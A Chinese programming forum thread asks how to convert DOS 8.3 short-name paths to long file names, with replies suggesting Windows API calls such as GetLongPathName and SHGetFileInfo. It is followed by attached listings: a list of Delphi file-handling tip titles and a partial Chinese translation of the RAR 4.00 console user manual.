怎样把一个字符串,里面包含DOS8位文件名的路径,转换为长文件名路径?

zfming 2000-08-24 09:53:00
...全文
700 8 打赏 收藏 转发到动态 举报
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
BCB 2001-02-05
  • 打赏
  • 举报
回复
你问:如何将短文件名改成长文件名?
直接改名就行,编程也是一样;
将 test.exe 直接接改成 test123456789.exe,
RenameFile(String("test.exe"),String("yutrwqeruqrwewerytewqu.exe"));

always 2001-02-03
  • 打赏
  • 举报
回复
我要将vb的源程序转换为c++b的源程序,谢谢大家。
茂奇软件 2000-08-28
  • 打赏
  • 举报
回复
Can I use GetLongPathName in the kernel.
jinsin 2000-08-28
  • 打赏
  • 举报
回复
使用API函数GetLongPathName,用法去查MSDN。
Wingsun 2000-08-28
  • 打赏
  • 举报
回复
使用FindFirstFile可以实现你的要求。
U皮特U 2000-08-28
  • 打赏
  • 举报
回复
代码如下:
SHFILEINFO sfi;
SHGetFileInfo("c:\\progra~1", 0, &sfi, sizeof(SHFILEINFO),SHGFI_DISPLAYNAME);
char* pFile = sfi.szDisplayName; // 此时pFile = "Program Files"

虎叔 2000-08-28
  • 打赏
  • 举报
回复
你的问题实在不知道什么意思?
zfming 2000-08-28
  • 打赏
  • 举报
回复
为什么没人理我?问题难吗?
Windows中的通用应用程序的类名 使用API函数复制移动文件 使用API访问ListBox项 使用GetTempFileName创建一个唯一的临时文件 使用INI文件 使用INI文件保存、装载字体信息 使用TFileStream 使用TStream保存字符串 使用TTreeview显示目录 使窗体的关闭按钮失效 修改文本文件 允许在资源管理器中拖放文件 减小EXE文件大小 列举驱动器 列出目录下的子目录 创建快捷方式 创建目录 删除文件到回收站 判断文件夹是否共享 剪贴板存放多个控件流 加载CDROM图标 压缩和解压流 取MP3的ID3-Tag 取Program files目录 取可执行文件类型 取和文件类型关联的应用程序 取当前程序所在目录 取指定文件的版本信息 取文件修改日期 取文件日期 取文件最后访问日期 取文件版本号 取文件的所有者 取目录大小 取磁盘可用空间和总空间 取设置当前目录 取设置文件夹的日期 向Exe文件中添加数据 向文件写添加文本 在TMemo光标位置插入一个文件 在Windows开始后自动运行一个程序 在应用程序中添加Exe文件并且执行 在文件中搜索字符串 在文件中搜索指定文本 在文本文件中搜索文本 将剪贴板复制到流和恢复 将文本文件赋值给一个字符串 将资源文件中Rft文本装载到TRichEdit 将长文件名转换成短文件名 彻底删除文件 打开资源管理器且显示指定文件夹 捕获DOS应用程序的输出 改变TPageControls的颜色 改名、移动、删除文件或目录 显示‘打开方式’对话框 显示文件属性对话框 显示目录选择对话框 显示目录选择对话框并指定初始目录 替换正运行的DLL 检查文件是否ASCII格式 检查文件是否在本地驱动器 检查文件是否已打开 检查文件是否正在使用 检查目录是否存在 比较两个文件是否相同 添加去掉路径名后的符号 添加文件到文档菜单 清空文档 获取文件类型 获得快捷方式信息 获得文件大小 计算文件的校验和 设置文件日期 读 table-textfile 到 StringGrid 读取二进制文件使用ASCII显示 转换OEM到ANSI 转换文件名为长文件名 运行一个程序或打开一个关联文件 返回UNC路径 通过CRC-32验证文件
用户手册 RAR 4.00 控制台版本 欢迎使用 RAR 压缩文件管理器! 简介 RAR 是一个强力压缩工具,允许你管理和操作压缩文件。控制台 RAR 只支持 RAR 格式,带有的 ".rar" 扩展名的文件。ZIP 和其他格式不被支持。Windows 用户可以 安装图形界面 RAR 版本 - WinRAR,它可以处理更多的压缩文件类型。 RAR 的功能包括: * 高度成熟的原创压缩算法 * 对于文本、声音、图像和 32 位和 64 位 Intel 可执行程序压缩的特殊优化算法 * 获得比类似工具更好的压缩率,使用'固实'压缩 * 身份校验(只有注册版本可用) * 自解压压缩文件和分卷压缩(SFX) * 对物理损伤的压缩文件的恢复能力 * 锁定,密码,文件顺序列表,文件安全和更多 配置文件 Unix 版本的 RAR 从用户的 home 或 /etc 目录中的 .rarrc 文件读取配置文件信息 (存储在 HOME 环境变量中) Windows 的版本 RAR 从 rar.ini 文件读取配置文件信息,它放在 rar.exe 文件相 同的目录中。 这个文件包含下列字符串: switches=任何 RAR 开关,用空格分开 例如: switches=-m5 -s 环境变量 可以通过建立"RAR"环境变量来添加默认参数到命令行中. 例如,在 UNIX 中,下列命令行可以被添加到你的配置中: RAR='-s -md1024' export RAR RAR 将使用这个字符串作为命令行的默认参数,并将使用 1024KB 字典大小来创建 “固实”压缩文件。 RAR 控制选项使用下列优先级: 命名行开关 最高优先级 在 RAR 变量中的开关 低优先级 保存在配置文件中的开关 最低优先级 日志文件 如果在命令行或配置文件中指定开关 -ilog ,RAR 将会把处理压缩文件中遇到的错误 等写到日志文件中。读取开关 -ilog 描述获得更多信息。 固实压缩的文件列表 - rarfiles.lst rarfiles.lst 包含一个用户定义的文件列表,告诉 RAR 添加文件到固实压缩文件时的顺 序。它可以包含文件名通配符和指定项目 -$default。默认项目定义了这个文件中与 其他项目不相符时的顺序清单位置。 注释字符是 ';'. 在 Windows 中,这个文件应该放在 RAR 所在的或 %APPDATA%\WinRAR 目录中, 在 Unix 中- 放在用户的 home 目录或在 /etc 中。 提高压缩率和操作速度的提示: - 在压缩文件中,小文件应该被组织在一起; - 频繁被处理的文件应该放在开始的位置。 普通的掩码越靠近顶端优先权就越高,但是这个规则存在例外。如果 rarfiles.lst 包含两个掩码,并且所有文件既匹配第一个掩码,也匹配第二个掩码, 较小的子集 或者更精确的匹配拥有更高的优先权。例如,如果你用 *.cpp 和 f*.cpp 掩码, f*.cpp 拥有更高的优先权。 RAR 命令行语法 ~~~~~~~~~~~~~~ 语法 RAR <命令> [ -<开关> ] <压缩文件> [ <@列表文件...> ] [ <文件...> ] [ <解压路径\> ] 描述 命令行选项 (命令和开关) 提供了使用 RAR 创建和管理压缩文件的控制方法。命 令是一个字符串(或单个的字母),命令 RAR 去执行一个相应的操作。开关被用来 改变 RAR 执行操作的方法。其它参数是压缩文件名和被压缩的文件或要从压缩文件 中被解压文件。 列表文件是一个包括处理的文件名的纯文本文件。第一列应该以文件名开始。可以 在//字符后添加注释。例如,你可以创建包含下列字符串的 backup.lst: c:\work\doc\*.txt //备份文本文档 c:\work\image\*.bmp //备份图片 c:\work\misc 接着运行: rar a backup @backup.lst 如果你希望从标准输入设备读取文件名,指定空的文件列表名(只有@)。 在列表文件中 Win32 控制台 RAR 使用 OEM (DOS) 编码。 你可以在同一命令行指定普通文件名和列表文件。如果文件和列表 文件都未被指定,那么 RAR 将默认是 *.*,来处理所有文件 在一个 UNIX 环境变量中,你需要将通配符置于引号中,避免被外壳扩展。例如, 这个命令将从当前路径中的 RAR 压缩文件解压所有的 *.asm 文件: rar e '*.rar' '*.asm' 命令可以是下列中的任何一个: a 添加文件到压缩文件中。 例子: 1) 从当前目录添加所有的 *.hlp 文件到 help.rar 压缩文件: rar a help *.hlp 2) 把当前目录和子目录的所有文件压缩为 362000 字节大小、固实的、 自解压分卷压缩文件并对没个卷添加恢复记录: rar a -r -v362 -s -sfx -rr save 因为尾指定文件名,假设为所有文件 (*)。 3) 作为一个特别的例外,如果目录名被作为参数指定并且目录名不包 含文件掩码和以反斜线结尾,即使指定了 -r 开关,目录和子目录的所 有内容都会被添加到压缩文件中。 下面的命令会把 Bitmaps 目录和它的子目录中的所有文件添加到 RAR 压缩文件 Pictures.rar 中: rar a Pictures.rar Bitmaps 4) 如果目录包含文件掩码或以反斜线结尾,将会应用普通的规则,你 需要指定 -r 开关来处理它的子目录。 下列命令会把 Bitmaps 目录中除了子目录外的所有文件添加,因为未 指定开关 -r: rar a Pictures.rar Bitmaps\* c 添加压缩文件注释。当压缩文件被处理时注释被显示。文件的注释长度限 制到 32767 字节 例子: rar c distrib.rar 注释也可以使用 -z[名称] 开关从文件添加: 下列命令从 info.txt 文件添加一个注释: rar c -zinfo.txt dummy cf 添加文件注释。当使用'v'命令时显示文件注释。文件的注释长度限制到 32767 字节。 例子: rar cf bigarch *.txt ch 改变压缩文件参数。 此命令能和大多数压缩文件变量开关一起使用修改压缩文件参数。对于象 -av, -cl, -cu, -tl 等没有专门命令的开关特别方便。 它不能重新压缩、解密或加密压缩文件数据,它不能整合或创建卷。如果 不和其它开关一起使用,'ch' 命令仅复制压缩文件数据而不修改它。 例如: 设置压缩文件时间为最新的文件: rar ch -tl files.rar cw 写压缩文件注释到指定文件。 输出文件格式依赖于 -sc 开关。 如果输出文件名没有指定,注释数据会被发送到标准输出设备。 例子: 1) rar cw oldarch comment.txt 2) rar cw -scuc arc unicode.txt 3) rar cw arc d 从压缩文件中删除文件。请注意,如果这个命令导致压缩文件中所有文件 全部删除,这个空的压缩文件将被删除。 e 解压文件到当前目录。 f 更新压缩文件中的文件。 更新打包到压缩文件后被改变的文件。这个命令不 向压缩文件中添加新文件。 i[i|c|h|t]=<字符串> 在压缩文件中查找字符串。 支持下列可选参数: i - 不区分大小写(默认); c - 区分大小写搜索; h - 十六进制搜索; t - 使用 ANSI, Unicode 和 OEM 字符表 (只有 Win32 可用); 如果没有指定任何参数,它可以使用简化的命令行语法 i<字符串> 来代 替 i=<字符串> 它允许指定带有另外一个参数的 't' 变量,例如,ict=字符串 在上面提 及的所有表中执行区分大小写的搜索。 例子: 1) rar "ic=first level" -r c:\*.rar *.txt 在 c:\*.rar 压缩文件中的 *.txt 文件执行区分大小写的 "first level" 字符串的搜索 2) rar ih=f0e0aeaeab2d83e3a9 -r e:\text 在 e:\text 目录下的 rar 压缩文件中搜索十六进制字符串 f0 e0 ae ae ab 2d 83 e3 a9。 k 锁定压缩文件。任何试图改变压缩文件的命令都会被忽略。 例子: rar k final.rar l[t,b] 压缩文件的内容列表[技术信息]。和 'v' 命令一样列出文件,但不包括 文件路径。也就是只显示文件名。当使用't'变量时可选技术信息(主操作 系统,固实标志和老版本标记)被显示。变量 'b' 强制 RAR 只输出单纯 的文件名,而没有其他任何的附加信息。 m[f] 移动到压缩文件中[只用于文件]。移动文件和目录会使压缩操作完成后它 们被删除。如果使用变量'f'和/或应用开关'-ed',则不删除目录。 p 打印文件到标准输出设备。 你可以把这个命令和 -inul 开关一起使用来禁止所有的 RAR 信息,并只 打印文件数据。当你需要发送一个文件到标准输出设备时,这也许很重要。 r 修复压缩文件。压缩文件修复是在两阶段中完成的。首先,在损坏的压缩 文件中查找恢复记录(参照'rr'命令)。如果压缩文件包含恢复记录,并且 损坏数据部分是连续的,而且少于N*512字节(N 处是放入压缩文件恢复块 的数字),则成功恢复压缩文件的机会非常高。当这个阶段完成,一个新的 压缩文件将被创建,名为_RECOVER.RAR。 如果损坏的压缩文件不包含恢复记录或如果压缩文件没有完全恢复导致大 的损伤,将执行第二阶段。这一阶段期间只重建压缩文件的结构,而不可 能恢复 CRC 校验失败的文件。它仍然可能恢复未受损的文件,因文件结 构破坏。这对于非固实压缩文件通常有用。 当第二阶段完成,重建结构的压缩文件将被保存为 rebuilt.arcname.rar, 'arcname' 的位置是原始压缩文件名。 RAR/DOS32 版本使用 _recover.rar 和 _reconst.rar 而不是上面提及的 名字。 在恢复记录进行中,当发现可疑文件时,RAR 可以提示用户。 可疑项目 名字: <可能的文件名> 大小: <大小> 压缩后: <压缩后大小> 添加它: 是/否/全部 回答 'y' 把这个项目添加到文件 rebuilt.arcname.rar 中。 例子: rar r buggy.rar rc 使用恢复卷(.rev 文件)重建丢失的卷。你需要指定任何已存在的卷作为 压缩文件名,例如,'rar rc backup.part03.rar' 读取 'rv' 命令描述得到关于恢复卷的信息。 rn 重命名压缩文件。 命令语法是: rar rn <压缩文件名> <源文件名1> <目标文件名1> ... <源文件名N> <目 标文件名N> 例如,下列命令: rar rn data.rar readme.txt readme.bak info.txt info.bak 在压缩文件 data.rar 中将把 readme.txt 重命名为 readme.bak 并把 info.txt 重命名为 info.bak。 在源文件和目标文件名中可以使用通配符来进行简单像改变文件扩展名的名 称转换。例如: rar rn data.rar *.txt *.bak 将把所有的 *.txt 文件重命名为 *.bak。 RAR 不检查目标文件名是否已经在压缩文件中存在,所以你需要小心,防止 重名。尤其是使用通配符时特别重要。这个命令有潜在的危险,因为一个错 误的通配符可以损坏所有的压缩文件名。 rr[N] 添加数据恢复记录。可选,多余信息(恢复记录)可以被添加到压缩文件 中。这将导致压缩文件大小稍微增加,但能在软盘错误或其它数据丢失 情况下帮助恢复压缩文件。一个恢复记录最大包含 524288 个恢复块。 块的数目可以在'rr'(N = 1,2 .. 524288)命令中直接指定或不用用户 指定,而是根据压缩文件的大小自动设定:一个恢复信息大小大约是总 压缩文件大小的1%,通常允许恢复达到压缩文件总大小的0.6%的连续数 据。 也可以以压缩文件大小的百分比来指定恢复记录的大小。只要把%添加到 命令参数后。 例如: rar rr3% arcname 注意,如果你从.bat 或 .cmd文件运行这个命令时,你需要使用rr3%%代 替rr3%,因为批处理命令把符号'%'作为批处理文件开始的参数。你可以 使用 'p' 代替'%',所以'rr3p'也可运行。 如果受损的数据是连续性的,则每个恢复记录块帮助恢复损坏信息的512 字节。如果多处损坏这个值将降低。 恢复记录的大小可以使用公式<压缩文件大小>/256 + <恢复记录数>*512 字节估计。 rv[N] 创建恢复卷(.rev文件),以后它可以用于重建卷组中丢失的文件。这个命 令只对多卷压缩文件敏感,你需要在组中指定第一个分卷文件的文件名。 例如: rar rv3 data.part01.rar 这个功能可以被用来备份,例如,发送一个多卷压缩文件到一个新组,并 且部分接收者没有收其中的一些文件。重新发送恢复卷代替普通卷,可以 减少传送文件的总数。 每个恢复卷可以重建一个丢失的 RAR 卷。例如,如果你有30个卷,3个恢 复卷,你可以创建任何3个丢失的卷。如果.rev文件的数目少于丢失卷的 数目,重建将不可能。普通和恢复卷的总数不能超过255。 原来的 RAR 卷在卷被创建后不能被修改。修复算法使用存储在 REV 文件 和 RAR 卷中的数据来重建丢失的 RAR 卷。所有如果你修改了 RAR 卷, 例如,在创建 REV 文件后锁定它们,修复操作将失败。 选项 参数指定创建恢复卷的数目,必须少于RAR卷的总数。你也可以 附加一个百分号到这个参数上,这样创建的.rev文件的数目将等于从 RAR 卷总数获得的这个百分比。 例如: rar rv15% data.part01.rar RAR 不管是使用‘rc’命令或自动时,如果在解压时无法定位下一卷,并 且发现可用数目的 .rev 文件,对丢失的卷和损坏的卷都试图重建。 损坏卷的原始副本在被重建前重命名为 *.bad。例如,volname.part03.rar 将被重命名为volname.part03.rar.bad。 s[名称] 转换压缩文件成自解压格式。压缩文件和自解压模块合并(使用 default.sfx模块或在开关中指定)。在 Windows 版本中 default.sfx 应 该放在RAR.exe 所在目录下,在 Unix 中在用户的 home 目录中,在 /usr/lib 或 /usr/local/lib 下。 s- 从已存在的自解压压缩文件中删除自解压模块。RAR 创建一个不带自解压 模块的新的压缩文件,原来的自解压文件不会被删除。 t 测试压缩文件。为了验证指定的文件,这个命令执行虚拟的文件解压操作, 不写出任何输出数据流。 例子: 在当前目录测试压缩文件: 或对于 Unix: rar t '*' 当前目录开始,测试所有子目录下的压缩包: rar t -r * 或对于 Unix: rar t -r '*' u 更新压缩文件中的文件。添加不在压缩文件中的文件和更新打包后改变了的 文件。 v[t,b] 详细列出压缩文件内容[技术信息]。文件列出所使用的格式:绝对路径名,文 件注释,原始和压缩后的大小,压缩率,最近更新日期和时间,属性,CRC, 压缩方式和解压所需的最小RAR版本。当使用't'变量时可选技术信息(主操作 系统,固实标志和老的文件版本标记)显示。变量 'b' 强制 RAR 只输出单纯 的文件名,而没有其他任何的附加信息。 列出所有压缩卷的内容,使用星号('*')代替压缩文件扩展名或使用'-v' 开关。 例子: 1) 列出 system.rar 压缩文件的内容 (技术信息)并使用重定向符输出 到文件 techlist.lst 中 rar vt system >techlist.lst 2) 列出 tutorial.rar 压缩文件的内容 (单纯文件名模式) rar vb tutorial x 带绝对路径解压 例子: rar x -av- -c- dime 10cents.txt 解压指定的文件到当前路径。AV 检查和注释显示被禁用。 开关 (与命令结合使用): -? 显示命令和开关的帮助。和没有参数或输入非法命令行选项时相同。 -- 停止开关扫描 这个开关告诉 RAR 命令行中没有更多的开关了。如果压缩文件或文件名 以 - 符号开头,可以使用它。没有'--'开关,这样的名字将被作为开关 对待。 例子: 从当前目录添加所有文件到固实压缩文件'-StrangeName' RAR a -s -- -StrangeName -ac 压缩或解压后清除存档属性(只有Windows版本可用). -ad 附加压缩文件名到目标路径中。 这个选项可以在解压一组压缩文件时使用。默认条件下 RAR 把从压缩文 件中解压的文件放在同一目录下,但是这个开关使从每个压缩文件中解压 的文件都创建一个单独的目录。 例子: rar x -ad *.rar data\ RAR 将每一个解压的文件在'data'下创建子目录。 -ag[格式] 使用当前的日期和时间生成压缩文件名。 当创建压缩文件时附加当前日期字符串到压缩文件名上。用于每日备份。 附加的字符串格式有几种可选的格式参数定义或使用"YYYYMMDDHHMMSS"。 字符串的格式可以包含下列字符: Y - 年 M - 月 MMM - 使用文本字符串作为月名(Jan,Feb,等.) W - 年的第几周 (每星期从星期一开始) A - 星期几 (星期一 -1,星期日 - 7) D - 月的第几天 E - 年的第几天 H - 小时 M - 分 (如果在小时后,被作为分钟对待) S - 秒 N - 压缩文件数。RAR 搜索要生成的名字的文件是否存在,如果发现 它已经存在,将递增一个压缩文件数字,直到生成一个唯一的名字。 'N' 格式化字符在创建卷时不被支持。 上面列出的每个字符串仅表示添加到压缩文件名中的一个字符。例如, 使用 WW 表示 2 数字的星期或 YYYY 定义 4 数字的年。 如果在格式化字符串的第一个字符是'+',日期字符串和基本压缩文件名 位置交换,所以日期将在压缩文件名之前。 格式化字符串可以包含在 '{' 和 '}' 包含的可选字符。此文本插入到压 缩文件名中。 所有其它字符被不变地添加到文件名上。 如果你需要更新已经存在的压缩文件,小心使用 -ag 开关。依赖于以前 使用的 -ag 传送的格式化字符串和时间,生成的和现有的压缩文件名可 能不匹配。在这种情况下 RAR 会创建一个新的压缩文件,而不是更新现 有文件。 例子: 1) 使用默认 YYYYMMDDHHMMSS 格式 rar a -ag backup 2) 使用 DD-MMM-YY 格式 rar a -agDD-MMM-YY backup 3) 使用 YYYYMMDDHHMM 格式,替换'backup'之前的日期 rar a -ag+YYYYMMDDHHMM backup 4) 使用 YYYY-WW-A 格式,包含区段描述 rar a -agYYYY{year}-WW{week}-A{wday} backup 5) 使用 YYYYMMDD 和压缩文件数。它允许你在同一天使用 -agyymmdd-nn 数次,每一个新的压缩文件名都将包含一个新的递增数字。 rar a -agYYYYMMDD-NN backup -ao 添加带有存档属性的文件 (只有 Windows 版本可用). 例子: 添加C:上所有带有存档属性的文件到'f:backup',并清除文件存档属性 rar a -r -ac -ao f:backup c:\*.* -ai 忽略文件属性。 当解压时实用此开关,RAR 不对解压的文件设置存储在压缩文件中的常 规文件属性。此开关保留由操作系统赋予新创建文件的属性。 在 Windows 中它影响存档、系统、隐藏和只读属性。在 Unix 中,用 户、组和其它文件属性。 -ap 压缩文件内部设置路径。当添加文件到压缩文件中时,路径被整合到文 件名中,解压时从文件名删除。 例如,如果你希望添加文件'readme.txt'到目录压缩文件'release' 的'DOCS\ENG'中,你可以运行: rar a -apDOCS\ENG release readme.txt 或者解压'ENG'到当前目录中: rar x -apDOCS release DOCS\ENG\*.* -as 同步压缩文件内容 如果压缩时使用这个开关,这些在当前被添加文件列表中不存在的被压缩 文件将从压缩文件中删除。它对于使用这个开关和 -u(更新)组合同步一 个压缩文件和正在压缩目录的内容很便利。 例如,执行这个命令后: rar a -u -as backup sources\*.cpp 压缩文件'backup.rar'将只包含目录'sources'中的*.cpp文件,所有其它 文件将被从压缩文件中删除。它和创建新的压缩文件很相像,但是有一个 重要的不同:如果最近备份之后没有文件被修改,这个操作比创建新的压 缩文件执行得快。 -av 添加身份校验(只有注册版本可用)。RAR将在每次新建或更新压缩文件时 添加关于创建者的信息、最后更新时间和压缩文件名。 如果一个包含身份校验的压缩文件被修改,而没有指定这个开关,则身份 校验信息将被删除。 使用'-av'开关的压缩文件当解压、测试、列表或更新时,RAR 将进行完 整性确认并显示信息: 校验身份信息... 在成功校验身份的情况下,显示消息'确定',创建者的名字和最近更新 信息会被显示。在身份校验失败的情况下,将显示'失败'。 RAR 身份验证可以被伪造,不能提供基于公钥的现代数字签名方案同等的 安全级别。我们推荐实用此 RAR 功能仅作为信息,像一个特殊的压缩文 件注释。当关于压缩文件的创建者创建信息特别重要时,不要使用它。 为了启用身份校验功能,程序必须注册。请联系你当地的发布点或网站发 布中心。 -av- 禁止检查或添加身份校验。 -cfg- 忽略配置文件和 RAR 环境变量。 -cl 转换文件名成小写字母。 -cu 转换文件名成大写字母。 -c- 禁止显示注释。 -df 压缩后删除文件 移动文件到压缩文件中。这个开关与命令'A'组合执行和命令'M'是同一动 作。 -dh 打开共享文件 允许处理有其它应用程序打开写的文件。 如果应用程序允许对文件的读取访问,这个开关有效。但是如果文件的访 问类型是私有,文件打开操作仍然会失败。 这个选项很危险,因为它允许压缩一个文件,而同时正被其它应用程序修 改,所以小心使用。 -dr 删除文件到回收站 压缩后删除文件并把它们放到回收站中。仅可用于 Windows 版本。 -ds 添加到一个固实压缩文件时不排序。 -dw 档案操作后清除文件 压缩后清除文件。在删除文件数据前使用 0 字节文件覆盖它们, 防止恢 复删除的文件。 -ed 不添加空目录 这个开关指出空目录不被存储到被创建的压缩文件中。当解压这样一个压 缩文件时, RAR 会基于他们内部的文件路径创建非空的目录。关于空目录 的信息丢失。非空目录除了名字外(访问权限, 流, 等。)其他所有属性全 部丢失, 所以只有在你不需要保留这样的信息时使用此开关。 如果 -ed 和 'm' 命令或 -df 开关一起被使用,RAR 将不能移除空的目录。 -ee 不处理扩展属性 禁止保存和修复扩展文件属性。只用于OS/2版本。 -en 不添加"压缩文件结束"块 默认情况下,RAR 在新建或更新压缩文件时在结束时添加 "压缩文件结 束"块。它允许跳过像数字安全签名等扩展数据,但是在一些特定条件下 禁用这些功能可能有用。例如,如果在一个压缩文件通过不可靠的连接在 两个系统之间传递,并且同时发送者在它里面添加新文件时,它可能对确 认在传输过程中已经接收的部分不会被另一端所修改很重要。 这个开关不能用在分卷上,因为压缩文件结束块包含正确处理卷的重要信 息。 -ep 从名称中排除路径包含此开关时,文件在加入压缩文件时不会包含路 径信息。这可能会有在压缩文件中存在数个相同名称的结果。 -ep1 从文件名中删除底层目录。不存储在命令行中输入的路径。 例子: tmp 目录中的所有文件和目录都将被添加到压缩文件'test'中,但是被压 缩文件名路径包含'tmp\' rar a -ep1 -r test tmp\* 这等价于下列命令: cd tmp rar a -r ..\test cd .. -ep2 扩展路径成完全路径。压缩时存储文件的完全路径(除了盘符和根目录路 径). -ep3 扩展路径包含盘符的完全路径。 仅用于 Win32 版本。 压缩时如果使用此开关则保存和恢复包括盘符的完全的文件路径。磁盘分 隔符(冒号)被下划线字符替换。 如果你解压时使用 -ep3,它把下划线改回为冒号并且把文件解压到它们 原始的目录和磁盘中。如果用户也指定了目标路径,它会被忽略。 此开关对于把数个磁盘备份到同一个压缩文件有帮助。例如,你可以运行: rar a -ep3 -r backup.rar c:\ d:\ e:\ 来创建备份并且: rar x -ep3 backup.rar 来恢复它。 小心使用 -ep3 开关,只有你确认压缩文件不包含任何恶意文件。换句话 说,如果是你自己创建的压缩文件或你完全相信它的作者才使用它。此开 关允许覆盖在你的计算机上任何地方的任何文件,包括重要的系统文件和 通常仅用于备份和恢复的目的。 -e[+]<属性> 指定排除或包含掩码属性文件。 <属性> 是十进位,八进位(以 '0' 开头)或十六进位 (以 '0x' 开头) 的数字格式。 默认, 在 <属性>没有‘+’标记, 此开关定义排除掩码。如果对 <属性> 和文件属性按位进行 AND 逻辑运算的结果不为 0,则文件将不会被处理。 如果‘+’符号存在,它指定包含掩码。只有具有在掩码中指定的属性中 的至少一种的文件会被处理。 在 Windows 版本中也可以使用D、S、H、A代替数字掩码符号表示目录和 文件的系统,隐藏,存档和只读属性。给出的属性的顺序并不重要。 Unix 版本支持 D 和 V 符号来定义目录和设备属性。 允许在命令行中把 -e 和 -e+ 都指定。 示例: 1) 仅有文件夹名字而不包含它们的内容 rar a -r -e+d dirs 2) 不压缩系统和隐藏属性的文件: rar a -esh files -f 更新文件。可以在解压或创建压缩文件时使用。命令字符串"a -f"等价于 命令'f',你也可以和命令'm'或'mf'一起使用'-f' 。如果开关'-f'和命 令'x'或'e'一起使用,则只有旧文件能被从压缩文件中解压的新版本替换。 3) 不解压只读文件: rar x -er files -hp[p] 加密文件数据和头。 这个开关和 -p[p] 类似,但是开关 -p 只加密文件数据,而使文件名等 其它信息可见。这个开关加密所有包括文件数据、文件名、大小、属性、 注释和其它块等所有可感知压缩文件区域,所以它提供了更高的安全等 级。在压缩文件中使用-hp 加密,没有密码甚至不可能查看文件列表。 例子: rar a -hpfGzq5yKw secret report.txt 将添加文件 report.txt 到加密的压缩文件secret.rar中,使用密码 'fGzq5yKw' -id[c,d,p,q] 禁用消息。 开关 -idc 禁用版权字符串。 开关 -idd 在操作结束禁止显示“完成”字符串。 开关 -idp 禁止百分比指示。 开关 -idq 打开安静模式, 仅错误消息和问题能被显示。 允许一次使用数个修饰, 如果开关 -idcdp 是正确的。 -ieml[.][地址] 使用 E-mail发送压缩文件。只有 Win32 版本可用。 附加一个使用添加命令创建或被更新的压缩文件到 E-mail 信息中。你需 要有 MAPI 兼容的E-mail客户端来使用这个开关(大部分现代的 E-mail 程序支持MAPI接口)。 你可以在开关中直接输入详细E-mail地址或留为空白。在以后可以由你的 E-mail 程序询问。可以指定用分号或逗号隔开的数个地址。 如果你添加一个'.'字母到 -ieml,成功附加到E-mail中后压缩文件会被 删除。如果创建多卷压缩文件使用这个开关,每一卷都附加单独的 E-mail 信息。 -ierr 发送所有消息到标准错误设备。 -ilog[文件名] 记录错误到文件中 (只有注册版本可用). 把错误信息写到 RAR 目录中的 rar.log 文件中。也可以在开关中指定其 它的日志文件名代替默认的 rar.log,例如,-ilogc:\log\backup.log。 如果指定的文件名包含路径,日志文件将会使用下列默认创建: 把错误信息写到 RAR 目录中的 rar.log 文件中。如果选项 "名称" 参数 没有指定, 日志文件将会使用下列默认创建: Unix: .rarlog 放在用户的 home 目录中; Windows: rar.log 放在 %APPDATA%\WinRAR 目录中; Dos: rar.log 放在 rar32.exe 文件相同的目录中。 如果 "名称" 参数包含路径文件名, RAR 会在默认目录中使用上面指 定的名称创建日志文件.如果你想改变日志文件的位置, 需要在 "名称"参 数中包含路径文件名。 例如: rar a -ilogc:\log\backup.log backup d:\docs 发生错误时会创建 c:\log\backup.log 日志文件。 -inul 禁止所有消息。 -ioff 在完成操作后关闭计算机。硬件必须支持断电功能。只有 Win32 版本可用。 -isnd 允许声音。 -k 锁定压缩文件. 任何试图改变压缩文件的命令都会被忽略。 -kb 保留损坏的解压文件。 RAR 默认解压后删除 CRC 错误的文件。开关 -kb 指定 CRC 错误的文件 不会被删除。 -m 设置压缩模式: -m0 存储 添加到压缩文件时不压缩文件。 -m1 最快 使用最快方式(低压缩) -m2 较快 使用快速压缩方式 -m3 标准 使用标准(默认)压缩方式 -m4 较好 使用较好压缩方式(较好压缩,但是慢) -m5 最好 使用最大压缩方式(最好的压缩,但是最慢) 如果没有指定这个开关,RAR使用-m3方式(标准压缩)。 默认情况下,RAR 在 -m1 和 -m2 模式中只使用常规压缩算法,高级算法 像声音和真彩处理只有在 -m3..-m5 模式下才启用,提升的文本压缩只有 在 -m4..-m5 中才被激活。默认值可以使用 -mc 开关替代。 -mc<参数> 设置高级压缩参数。 这个开关主要是用于进行测试和试验,在真实环境中通常最好允许 RAR 自动选择最佳参数。请注意,不适当的使用这些开关可能导致非常严重执 行和压缩损失,所以只有在你清楚理解你所要做的时候使用它。 它有下列语法: -mc[参数1][:参数2][模块][+ 或 -] <模块>的位置是指示压缩算法的一个字符,它必须被设置。 它有下列值: A - 声音压缩; C - 真彩色(RGB)数据压缩; D - 增值压缩; E - 32-位 x86 Intel 可执行文件压缩; I - 64-位 Intel Itanium 可执行文件压缩; T - 文本压缩。 在开关结尾的'+'标记应用选择的算法模块处理所有的数据,'-'完全禁用 该模块。如果没有指定标记,RAR 将基于数据和当前的压缩模式自动选择 模块。 开关 -mc- 禁止所有可选模块,只允许常规的压缩算法。 <参数1> 和 <参数2> 根据模块而决定的参数,其描述如下。 音频压缩,增值压缩: <参数1> 是通道的字节数 (可以是1 - 31)。RAR 拆分多位声道成单位声 道,例如,两个16位音频声道可以被 RAR 看作每个宽一字节的四个声道。 <参数2> 被忽略。 32位 x86 Intel 可执行文件压缩, 64位 Intel Itanium 可执行文件压缩, 真彩(RGB)数据压缩: <参数1> 和 <参数2> 被忽略。 文本压缩: <参数1> 是 PPM 算法的次序+(可以是 2 - 63)。通常高的值会略微提高 多余数据的压缩率,但是必须有足够的内存来用于 PPM。在缺乏内存的条 件下结果可能相反。更高的规则值会减慢压缩和解压的速度。 <参数2>对于 PPM 可用的以兆字节位单位的内存 (1-128)。更高的值可以 提高压缩率,但是注意PPM压缩和解压使用的内存大小相等,所以创建一 个压缩文件时如果分配太多的内存,其他人在安装了比较少内存的机器上 解压它时可能出现问题。解压缩也可以使用虚拟内存,但是可能变得非常 慢。 例子: 1) 开关 -mc1a+ 强制使用对所有数据使用8位单声道声音压缩算法。 2) 开关 -mc10:40t+ 强制使用对所有数据使用文本压缩优化算法,设置压 缩次序到 10 并分配40 MB内存。 3) 开关 -mc12t 设置压缩次序到 12,设置文本压缩顺序为12,当使用文 本压缩时,让RAR决定何时使用它。 4) 开关 -mct- -mcd- 禁止文本和增值压缩。 -mdKB大小选择字典大小。必须是64,128,256,512,1024,2048或4096或 单个字母 'a','b','c','d','e','f','g'。 这个可变大小的字典是被压缩算法使用的专用的内存区域。如果被压缩文 件的大小(或在一个固实压缩文件中的总文件大小)比压缩文件大许多,则 通常增加字典大小会增加压缩率,减慢压缩速度和增加内存需要。 如果字典比原数据大,RAR可以减少字典大小.它可以减少内存的需要而不 